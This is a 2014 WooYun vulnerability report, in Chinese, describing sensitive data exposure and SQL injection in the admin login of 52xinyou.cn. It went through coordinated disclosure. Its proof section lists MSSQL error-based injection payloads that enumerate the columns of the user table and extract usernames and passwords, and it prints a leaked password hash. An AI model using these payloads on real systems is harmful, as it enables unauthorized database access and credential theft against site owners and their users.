漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-053684
漏洞标题:信游科技敏感信息泄露及sql注入
相关厂商:52xinyou.cn
漏洞作者: diguoji
提交时间:2014-03-17 13:52
修复时间:2014-05-01 13:53
公开时间:2014-05-01 13:53
漏洞类型:重要敏感信息泄露
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-17: 细节已通知厂商并且等待厂商处理中
2014-03-18: 厂商已经确认,细节仅向厂商公开
2014-03-28: 细节向核心白帽子及相关领域专家公开
2014-04-07: 细节向普通白帽子公开
2014-04-17: 细节向实习白帽子公开
2014-05-01: 细节向公众公开
简要描述:
信游科技敏感信息泄露+后台登陆POST注入
详细说明:
漏洞证明:
a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),1) from xy_users)) and '1'='1
a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),2) from xy_users)) and '1'='1
a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),3) from xy_users)) and '1'='1
a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),4) from xy_users)) and '1'='1
依次爆出 Group State isdelete
a' and 1=convert(int,(select top 1 col_name(object_id ('xy_users'),8) from xy_users)) and '1'='1
成功爆出xy_users表中所有列ID Account Group State isdelete Name Password
爆内容
a' and (select top 1 xy_users.Name from xy_users)>0--
a' and (select top 1 xy_users.Password from xy_users)>0--
在将 nvarchar 值 'abb8cd5c9d9d1e3c926f9ad19f863781' 转换成数据类型 int 时失败
破之
修复方案:
删除WEB备份+过滤,验证码也有问题
版权声明:转载请注明来源 diguoji@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-03-18 12:44
厂商回复:
非常感激,不过已被其他白帽子提交了。
最新状态:
暂无